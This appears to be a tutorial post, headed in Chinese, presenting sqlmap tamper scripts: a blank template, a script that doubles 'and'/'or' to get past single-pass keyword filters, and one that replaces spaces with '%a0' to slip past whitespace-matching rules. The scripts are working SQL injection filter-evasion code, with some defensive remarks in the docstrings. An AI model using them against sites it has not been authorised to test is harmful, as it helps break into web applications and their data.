标准模板
#!/usr/bin/env python
"""
Copyright © 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入SQLMap中lib\core\enums中的PRIORITY优先级函数
from lib.core.enums import PRIORITY
# 定义脚本优先级
# Script priority, taken from sqlmap's PRIORITY enum.
priority = PRIORITY.LOW

# dependencies() is where the script is described; its body may be empty.
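def dependencies():
    """Describe this tamper script; the template leaves the hook empty."""
    # The body indentation was lost in the listing; restored so the
    # definition parses.
    pass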
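def tamper(payload, **kwargs):
    """Return the payload after this script's modifications.

    This is the template form: no processing is applied yet, so the payload
    comes back unchanged.

    Args:
        payload: The payload passed in; this is the argument a tamper
            script normally rewrites.
        **kwargs: Extra keyword arguments. Rarely needed: per the original
            note, the official tamper scripts use it in only two places,
            both times just to change an HTTP header.

    Returns:
        The final payload. A tamper function must always return it.
    """
    # Script-specific payload processing goes here.
    return payload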
第一个双写绕过脚本double-and-or.py
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright © 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入正则模块,用于字符的替换
import re
# sqlmap中lib\core\enums中的PRIORITY优先级函数
from lib.core.enums import PRIORITY
# 定义脚本优先级
# Script priority, taken from sqlmap's PRIORITY enum.
priority = PRIORITY.NORMAL
# 脚本描述函数
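def dependencies():
    """Script description hook; this script leaves it empty."""
    # The body indentation was lost in the listing; restored so the
    # definition parses.
    pass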
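def tamper(payload, **kwargs):
    """Double every ``and`` / ``or`` in the payload (``anandd`` / ``oorr``).

    The match is case-insensitive and is not limited to whole words, so the
    letters are rewritten wherever they occur (``ORDER`` becomes
    ``oorrDER``), and the replacement text is always lower case.

    The doubled form turns back into the keyword only when a filter deletes
    ``and`` / ``or`` once without re-scanning its own output, which is why
    single-pass keyword stripping is not a reliable SQL injection control.

    Args:
        payload: The payload string to rewrite; empty or ``None`` values are
            returned untouched.
        **kwargs: Unused by this script.

    Returns:
        The rewritten payload.
    """
    # Start from the incoming payload so falsy input is returned as-is.
    retVal = payload

    if payload:
        # The typographic quotes in the published listing are restored to
        # plain ASCII quotes; the patterns themselves are unchanged.
        retVal = re.sub(r"(?i)(or)", r"oorr", retVal)
        retVal = re.sub(r"(?i)(and)", r"anandd", retVal)

    # Hand the final payload back to the caller.
    return retVal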
第二个空格替换脚本space2A0.py
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright © 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
# Script priority, taken from sqlmap's PRIORITY enum.
priority = PRIORITY.LOW
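def dependencies():
    """Script description hook; this script leaves it empty."""
    # The body indentation was lost in the listing; restored so the
    # definition parses.
    pass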
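def tamper(payload, **kwargs):
    """Replace spaces in the payload with the literal text ``%a0``.

    Characters are copied unchanged up to the first whitespace character,
    which is always replaced. After that, only a plain space outside single-
    and double-quoted text is replaced; other whitespace (tabs, newlines) and
    spaces inside quotes are kept. The original comments indicate the script
    was adapted from one that emitted ``+`` instead.

    ``%a0`` is the URL-encoded byte 0xA0, so filters and detection rules that
    match only ASCII whitespace between SQL keywords should normalise such
    bytes before matching.

    NOTE: quote characters that occur before the first whitespace are not
    tracked, because the quote checks sit in the ``elif`` chain of the
    ``firstspace`` test. That behaviour is kept as-is.

    Args:
        payload: The payload string to rewrite; empty or ``None`` values are
            returned untouched.
        **kwargs: Unused by this script.

    Returns:
        The rewritten payload.
    """
    retVal = payload

    if payload:
        # Collect the pieces and join once instead of repeated string +=.
        pieces = []
        quote, doublequote, firstspace = False, False, False

        # Iterating the string directly replaces the xrange(len(...)) index
        # loop and yields the same characters in the same order.
        for char in payload:
            if not firstspace:
                if char.isspace():
                    firstspace = True
                    # "%a0" takes the place of the "+" used by the script
                    # this one was derived from.
                    pieces.append("%a0")
                    continue
            elif char == '\'':
                quote = not quote
            elif char == '"':
                doublequote = not doublequote
            elif char == " " and not doublequote and not quote:
                pieces.append("%a0")
                continue

            pieces.append(char)

        retVal = "".join(pieces)

    return retVal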